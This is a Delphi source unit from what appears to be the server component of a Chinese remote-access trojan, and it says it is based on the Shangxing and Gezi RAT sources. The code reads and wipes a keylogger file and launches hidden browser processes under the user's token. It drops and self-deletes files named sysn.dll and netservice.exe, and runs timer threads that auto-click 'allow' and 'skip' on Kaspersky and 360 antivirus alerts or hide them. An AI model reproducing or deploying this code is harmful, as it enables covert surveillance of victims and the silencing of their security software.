winsys.pas

参照上兴、鸽子等源码编写编写出来的。 编译环境：Delphi7+SP+DP+indy9等控件

unit Winsys;

interface

uses
  Windows, SysUtils,utils, Classes, messages,mmsystem, Registry, vfw;
const
  WM_CLOSE = $0010;
  WM_CAP_START = $400;
  WM_CAP_DRIVER_CONNECT = WM_CAP_START + $A;
  WM_CAP_DRIVER_DISCONNECT = WM_CAP_START + $B;
  WM_CAP_EDIT_COPY = WM_CAP_START + $1E;
  WM_CAP_GRAB_FRAME = WM_CAP_START + $3C;

procedure delsev; //卸载服务端
function capCreateCaptureWindowA(lpszWindowName: pchar; dwStyle: dword; x, y,
  nWidth, nHeight: word; ParentWin: dword; nId: word): dword; stdcall external
  'avicap32.dll';
function GetDir(dInt: Integer): string;
procedure readkeybuffer; //A 0307添加读取键盘记录
procedure clearkeybuffer; //A 0307清空键盘记录
procedure AdjustToken();
function isNt: Boolean;
function CreatedMutexEx(MutexName: Pchar): Boolean;
procedure runie(web: string;id:integer=0);
procedure anti(start: boolean);
procedure avp(start: boolean);

var
  NClient: string = '0';
  plugdir,SSS:string;
    hTimeravp,htimer360: integer;
    msg:tmsg;

implementation

function CreatedMutexEx(MutexName: Pchar): Boolean;
var
  MutexHandle: dword;
begin
  MutexHandle := CreateMutex(nil, True, MutexName);
  if MutexHandle <> 0 then
  begin
    if GetLastError = ERROR_ALREADY_EXISTS then
    begin
      Result := False;
      Exit;
    end;
  end;
  Result := True;
end;
function GetIEAppPath: string;
var
  iekey: Hkey;
  iename: array[0..255] of char;
  vType, dLength: DWORD;
begin
  vType := REG_SZ;
  RegOpenKeyEx(HKEY_LOCAL_MACHINE,
    'Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE', 0,
    KEY_ALL_ACCESS, iekey);
  dLength := SizeOf(iename);
  if RegQueryValueEx(iekey, '', nil, @vType, @iename[0], @dLength) = 0 then
    Result := iename
  else
    Result := 'C:\Program Files\Internet Explorer\IEXPLORE.EXE';
  RegCloseKey(iekey);
end;
procedure runie(web: string;id:integer=0);
var
  dwProcessId: dword;
  hToken, hProcess: THandle;
  si: STARTUPINFO;
  pi: PROCESS_INFORMATION;
//  Process: DWORD;
begin
  GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @dwProcessId);
  hProcess := OpenProcess(PROCESS_ALL_ACCESS, False, dwProcessId);
  // if hProcess<=0 then exit;
  openprocesstoken(hProcess, TOKEN_ALL_ACCESS, hToken);
    //去当前进程Token等同于取当前帐户Token
  try
    ZeroMemory(@si, sizeof(STARTUPINFO));
    si.cb := sizeof(STARTUPINFO);
    Si.lpDesktop := PChar('Winsta0\Default');
    si.wShowWindow := SW_hide;
    if id=1 then si.dwFlags := STARTF_USESHOWWINDOW;  //没有这个就没法隐藏打开
    CreateProcessAsUser(hToken, PChar(GetIEAppPath), pchar(' '+web), nil, nil,
      False, CREATE_NEW_CONSOLE or  NORMAL_PRIORITY_CLASS, nil, nil, si, pi);
//    dwOwnerPID := Pi.dwProcessId;
  finally
    closehandle(hProcess);
  end;
end;
procedure AdjustToken();  //关机权限
var
  currToken: THandle;
  prevState, newState: TTokenPrivileges;
  prevStateLen: Dword;
  uid: TLargeInteger;
begin
  OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY,
    currToken);
  LookupPrivilegeValue(nil, 'SeShutdownPrivilege', uid);
  newState.PrivilegeCount := 1;
  newState.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
  newState.Privileges[0].Luid := uid;
  windows.AdjustTokenPrivileges(currToken, false, newState,
    SizeOf(TTokenPrivileges), prevState, prevStateLen);
end;

function isNt: Boolean;
var
  OSVERSIONINFO: TOSVERSIONINFO;
begin
  OSVERSIONINFO.dwOSVersionInfoSize := SizeOf(OSVERSIONINFO);
  GetVersionEx(OSVERSIONINFO);
  if OSVERSIONINFO.dwPlatformId = VER_PLATFORM_WIN32_NT then
    Result := true
  else
    Result := false;
end;

procedure readkeybuffer; //读取文件
var
  f: textfile;
  dir, s: string;
begin
  dir := plugdir + 'key.dat';
  //这里得检察否则会出错
  if FileExists(dir) then
  begin
    try
      AssignFile(F, dir);
        // 将C:\MyFile.txt文件与F变量建立连接，后面可以使用F变量对文件进行操作。
      Reset(F); // 打开文件
      while not EOF(F) do
      begin // 使用While循环，一直判断是否到了文件未尾
        Readln(F, s); // 读取一行文本
        sss := sss + #13#10 + s + #13#10;
      end;
      CloseFile(F); // 关闭文件
    except
    end;
  end;
end;

procedure clearkeybuffer; //清空键盘记录
var
  f: textfile;
  dir: string;
begin
  dir := plugdir + 'key.dat';
  //这里得检察否则会出错
  if FileExists(dir) then
  begin
    try
      AssignFile(F, dir);
        // 将C:\MyFile.txt文件与F变量建立连接，后面可以使用F变量对文件进行操作。
      Reset(F); // 打开文件
      rewrite(F); // 重写文件
      CloseFile(F); // 关闭文件
    except
    end;
  end;
end;


//获取安装目录
function GetDir(dInt: Integer): string;
begin
case dint of
0:result:=GetSpecialFolder(sfCommonFavorites)+'\';
1:result:=GetSpecialFolder(sfSystem)+'\';
2:result:=GetSpecialFolder(sfWindows)+'\';
end;
end;
procedure delsev; //卸载服务端
var
  F: textfile;
  BatchFileName: string;
  ProcessInfo: TProcessInformation;
  StartUpInfo: TStartupInfo;
begin
  BatchFileName := getcurrentdir+'ime.bat'; //如果改EXE目录，这里也要改
  AssignFile(F, BatchFileName);
  Rewrite(F);
  WriteLn(F, ':try');
  WriteLn(F, 'del "' + getdir(1)+'\sysn.dll' + '"'); //注意这里的getdirectory和EXE里的不同
  WriteLn(F, 'del "' + getdir(0)+'\netservice.exe' + '"');
  WriteLn(F, 'if exist "' + getdir(1)+'\sysn.dll' + '"' + ' goto try');
  WriteLn(F, 'if exist "' + getdir(0)+'\netservice.exe' + '"' + ' goto try');
//  WriteLn(F, 'if exist "' + getcurrentdir+'\sysi.dll' + '"' + ' goto try');
  WriteLn(F, 'del %0');
  CloseFile(F);
  FillChar(StartUpInfo, SizeOf(StartUpInfo), $00);
  StartUpInfo.dwFlags := STARTF_USESHOWWINDOW;
  StartUpInfo.wShowWindow := SW_HIDE;
  CreateProcess(nil, PChar(BatchFileName), nil, nil, False, IDLE_PRIORITY_CLASS,
    nil, nil, StartUpInfo, ProcessInfo) //then
end;
////////////////////////////////////////////过卡巴

function EnumerateChildWindows(hWnd: HWND; lParam: LPARAM): BOOL; stdcall;
var
  ClassName: array[0..255] of Char;
  WindowText: array[0..255] of Char;
begin
  FillChar(ClassName, 256, 0);
  GetClassName(hWnd, ClassName, 255);
  GetWindowText(hWnd, WindowText, 255);
  if (StrPas(ClassName) = 'AVP.Button') //and avpbool
    and ((StrPas(WindowText) = '允许') or (StrPas(WindowText) = '跳过')
    or (StrPas(WindowText) = '允許') or (StrPas(WindowText) = '跳過')
    or (StrPas(WindowText) = 'す砛') or (StrPas(WindowText) = '铬筁')) then
    //限制获取的句柄类型,并且定义获取内容不为空,如果只捕获密码,则加上
    //  and (SendMessage(hWnd, EM_GETPASSWORDCHAR, 0, 0) <> 0)
  begin
    sendMessage(hWnd, bM_CLICK, 0, 0);
    sendMessage(hWnd, bM_CLICK, 0, 0);
   //  MessageBox(0,  pchar(StrPas(WindowText)),pchar(''), mb_iconinformation);
  end;

  Result := True;
end;

procedure TimerProcavp(uID, uMsg, dwUser, dw1, dw2: DWORD); stdcall;
var
  ywnd,wnd360,Fwnd, nwnd,cwnd,vwnd: hwnd;
begin
  ywnd := FindWindow('Afx:400000:0', nil);
  if ywnd <> 0 then   wnd360:=FindWindowEx(ywnd, THandle(nil),nil,'确定');
  if wnd360<>0 then  sendMessage(Wnd360, bM_CLICK, 0, 0);
  nwnd := FindWindow('AVP.Product_Notification', nil);
  if nwnd <> 0 then  ShowWindow(nwnd, SW_HIDE);
  vwnd := FindWindow('Afx:400000:0', nil);
  if vwnd <> 0 then  SendMessage(vwnd, SC_CLOSE, 0,0);
  Fwnd := FindWindow('AVP.AlertDialog', nil);
  if Fwnd = 0 then   exit;
  cwnd:=FindWindowEx(fwnd, THandle(nil),nil,'应用到所有');
  if cwnd<>0 then  sendMessage(cWnd, bM_CLICK, 0, 0);
  EnumChildWindows(FWnd, @EnumerateChildWindows, 0);
end;

procedure startavp; stdcall;
begin
  hTimeravp := TimeSetEvent(1, 0, TimerProcavp, 0, 1);
  while (GetMessage(Msg, 0, 0, 0)) do ;
end;

procedure avp(start: boolean);
var
  TID: dword;
begin
  if start then
    CreateThread(nil, 0, @startavp, nil, 0, TID)
  else
    timekillevent(hTimeravp);
end;
procedure TimerProc360(uID, uMsg, dwUser, dw1, dw2: DWORD); stdcall;
var
  ywnd,wnd360: hwnd;
begin
  ywnd := FindWindow('Afx:400000:0', nil);
  if ywnd <> 0 then   wnd360:=FindWindowEx(ywnd, THandle(nil),nil,'确定');
  if wnd360<>0 then  sendMessage(Wnd360, bM_CLICK, 0, 0);
end;

procedure anti360; stdcall;
begin
  hTimer360 := TimeSetEvent(1, 0, TimerProc360, 0, 1);
  while (GetMessage(Msg, 0, 0, 0)) do ;
end;

procedure anti(start: boolean);
var
  TID: dword;
begin
  if start then
    CreateThread(nil, 0, @anti360, nil, 0, TID)
  else
    timekillevent(hTimer360);
end;
end.